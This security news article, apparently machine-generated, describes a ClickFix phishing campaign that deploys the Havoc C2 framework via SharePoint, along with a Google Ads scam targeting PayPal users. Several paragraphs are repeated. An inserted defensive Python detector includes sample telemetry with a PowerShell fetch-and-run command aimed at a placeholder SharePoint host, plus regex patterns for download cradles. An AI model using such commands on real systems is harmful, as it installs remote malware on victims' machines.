Today's cybersecurity headlines are brought to you by ThreatPerspective


Ethical Hacking News

New ClickFix Phishing Campaign Deploys Havoc C2 Framework via SharePoint Sites



A new phishing campaign has been uncovered that leverages the ClickFix technique to deliver an open-source command-and-control (C2) framework called Havoc. This threat actor uses a sophisticated approach to evade detection and trick users into executing malicious PowerShell commands. The campaign also exploits a known loophole in Google Ads policies to target PayPal customers with bogus ads, highlighting the need for increased vigilance in protecting individuals and organizations against emerging threats.

  • Cybersecurity researchers have discovered a new phishing campaign using the ClickFix technique to deliver an open-source command-and-control (C2) framework called Havoc.
  • The threat actor employs a sophisticated approach to evade detection and trick users into executing malicious PowerShell commands.
  • The campaign also exploits a known loophole in Google Ads policies to target PayPal customers with bogus ads.
  • The use of the Microsoft Graph API helps to conceal C2 communication within well-known services, making it challenging for security researchers to detect.
  • Malwarebytes warns that tech support scammers are exploiting this Google Ads loophole to impersonate popular websites and trick victims into sharing personal and financial information.



    Cybersecurity researchers have recently uncovered a new phishing campaign that leverages the ClickFix technique to deliver an open-source command-and-control (C2) framework called Havoc. This threat actor employs a sophisticated approach, utilizing modified versions of existing tools and services to evade detection and trick users into executing malicious PowerShell commands.

    At the heart of this campaign is a phishing email containing an HTML attachment ("Documents.html") that, when opened, displays an error message using the ClickFix technique. This error message tricks users into copying a malicious PowerShell command and running it themselves in a terminal or PowerShell window, thereby triggering the next stage of the attack. The initial stage downloads and executes a PowerShell script hosted on an adversary-controlled SharePoint server.

    The newly downloaded PowerShell script then checks whether it is being run within a sandboxed environment before proceeding to download the Python interpreter ("pythonw.exe") if it is not already present on the system. The next step involves fetching and executing a Python script from the same SharePoint location that serves as a shellcode loader for KaynLdr, a reflective loader written in C and ASM that is capable of launching an embedded DLL, in this case the Havoc Demon agent, on the infected host.

    The Havoc framework supports various features to gather information, perform file operations, carry out command and payload execution, token manipulation, and Kerberos attacks. The threat actor utilizes the Microsoft Graph API to conceal C2 communication within well-known services, making it challenging for security researchers to detect.

    Furthermore, Malwarebytes has revealed that threat actors are continuing to exploit a known loophole in Google Ads policies to target PayPal customers with bogus ads served via advertiser accounts that may have been compromised. These ads aim to trick victims searching for assistance related to account issues or payment concerns into calling a fraudulent number that likely ends with them handing over their personal and financial information.

    Jérôme Segura, senior director of research at Malwarebytes, stated that the weakness within Google's policies for landing pages (also known as final URLs) allows anyone to impersonate popular websites so long as the landing page and display URL (the webpage shown in an ad) share the same domain. Tech support scammers are like vultures circling above the most popular Google search terms, especially when it comes to any kind of online assistance or customer service.

    In recent times, cybersecurity researchers have highlighted various vulnerabilities and threats that pose significant risks to individuals and organizations alike. It is essential for users to remain vigilant and take proactive measures to protect themselves against these emerging threats.

    Cybersecurity researchers are calling attention to a new phishing campaign that employs the ClickFix technique to deliver an open-source command-and-control (C2) framework called Havoc. The threat actor hides each malware stage behind a SharePoint site and uses a modified version of Havoc Demon in conjunction with the Microsoft Graph API to obscure C2 communications within trusted, well-known services.

    The starting point of the attack is a phishing email containing an HTML attachment ("Documents.html") that, when opened, displays an error message. The message uses the ClickFix technique to trick users into copying a malicious PowerShell command and running it themselves in a terminal or PowerShell window, thereby triggering the next stage.

    The command is designed to download and execute a PowerShell script hosted on an adversary-controlled SharePoint server. The newly downloaded PowerShell checks if it's being run within a sandboxed environment before proceeding to download the Python interpreter ("pythonw.exe"), if it's not already present in the system.

    The next step involves fetching and executing a Python script from the same SharePoint location that serves as a shellcode loader for KaynLdr, a reflective loader written in C and ASM that is capable of launching an embedded DLL, in this case, the Havoc Demon agent on the infected host.
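    The chain described above has two links a defender can see in process-creation telemetry: a PowerShell instance, started from a user-facing parent, whose command line fetches a script from a *.sharepoint.com URL and evaluates it, followed by pythonw.exe spawned by that same PowerShell process. The script below is an added example written for this page, not code from the article, Fortinet or the Havoc project; it runs the two checks over constructed Sysmon-style records. The field layout, the parent-process list, the regular expressions and every host name, path and PID in the sample events are assumptions made for the example.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record, reduced to the fields a Sysmon Event ID 1
    or Windows 4688 event would provide (constructed for this example)."""
    pid: int
    ppid: int
    image: str
    parent_image: str
    cmdline: str


# Stage-1 indicators: the command line both downloads from a SharePoint site
# and evaluates the result. These are assumed patterns, not the campaign's own.
DOWNLOAD_CRADLE = re.compile(
    r"\b(iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring|iex|invoke-expression)\b",
    re.IGNORECASE,
)
SHAREPOINT_URL = re.compile(r"https?://[a-z0-9.-]+\.sharepoint\.com/", re.IGNORECASE)

# Parents from which a user pasting a ClickFix command would typically launch
# PowerShell (assumed list; tune it to your environment).
USER_FACING_PARENTS = {
    "explorer.exe", "cmd.exe", "windowsterminal.exe",
    "outlook.exe", "msedge.exe", "chrome.exe", "firefox.exe",
}


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def is_stage1(ev: ProcEvent) -> bool:
    """Stage 1: PowerShell from a user-facing parent that downloads from
    *.sharepoint.com and runs what it downloaded."""
    return (
        basename(ev.image) in {"powershell.exe", "pwsh.exe"}
        and basename(ev.parent_image) in USER_FACING_PARENTS
        and SHAREPOINT_URL.search(ev.cmdline) is not None
        and DOWNLOAD_CRADLE.search(ev.cmdline) is not None
    )


def detect(events):
    """Walk events in chronological order; report stage-1 hits and any
    pythonw.exe whose parent is a PowerShell process already flagged."""
    findings = []
    stage1_pids = set()
    for ev in events:
        if is_stage1(ev):
            stage1_pids.add(ev.pid)
            findings.append({"stage": 1, "pid": ev.pid,
                             "reason": "powershell download-and-run from sharepoint.com"})
        elif basename(ev.image) == "pythonw.exe" and ev.ppid in stage1_pids:
            findings.append({"stage": 2, "pid": ev.pid,
                             "reason": f"pythonw.exe spawned by flagged powershell pid {ev.ppid}"})
    return findings


# Constructed sample telemetry: one malicious chain plus two benign look-alikes.
SAMPLE_EVENTS = [
    ProcEvent(4100, 1200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\explorer.exe",
              'powershell.exe -w hidden -c "iwr https://tenant-placeholder.sharepoint.com/sites/docs/s.ps1 | iex"'),
    ProcEvent(4200, 4100, r"C:\Users\Public\pythonw.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"pythonw.exe C:\Users\Public\script_placeholder.py"),
    # Benign: a user opening a SharePoint page from PowerShell, no cradle.
    ProcEvent(4300, 1200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\explorer.exe",
              'powershell.exe -c "Start-Process https://tenant-placeholder.sharepoint.com/sites/hr"'),
    # Benign: pythonw.exe started by an editor, not by a flagged PowerShell.
    ProcEvent(4400, 3000, r"C:\Python312\pythonw.exe", r"C:\Program Files\Code\code.exe",
              r"pythonw.exe C:\Users\alice\project\app.py"),
]


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

    Linking stage 2 to a previously flagged PID is what keeps the rule quiet on hosts where pythonw.exe is legitimately installed; on its own, "pythonw.exe child of powershell.exe" would fire on every developer workstation.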

    "The threat actor uses Havoc in conjunction with the Microsoft Graph API to conceal C2 communication within well-known services," Fortinet said, adding the framework supports features to gather information, perform file operations, as well as carry out command and payload execution, token manipulation, and Kerberos attacks.

    The development comes as Malwarebytes revealed that threat actors are continuing to exploit a known loophole in Google Ads policies to target PayPal customers with bogus ads served via advertiser accounts that may have been compromised.

    The ads seek to trick victims searching for assistance related to account issues or payment concerns into calling a fraudulent number that likely ends with them handing over their personal and financial information.

    "A weakness within Google's policies for landing pages (also known as final URLs), allows anyone to impersonate popular websites so long as the landing page and display URL (the webpage shown in an ad) share the same domain," Jérôme Segura, senior director of research at Malwarebytes, said.

    "Tech support scammers are like vultures circling above the most popular Google search terms, especially when it comes to any kind of online assistance or customer service."




    Related Information:
  • https://www.ethicalhackingnews.com/articles/New-ClickFix-Phishing-Campaign-Deploys-Havoc-C2-Framework-via-SharePoint-Sites-ehn.shtml

  • https://thehackernews.com/2025/03/hackers-use-clickfix-trick-to-deploy.html

  • https://www.area51net.com/HOME/articleType/ArticleView/articleId/4864096/Hackers-Use-ClickFix-Trick-to-Deploy-PowerShell-Based-Havoc-C2-via-SharePoint-Sites


  • Published: Mon Mar 3 09:25:20 2025 by llama3.2 3B Q4_K_M

    © Ethical Hacking News. All rights reserved.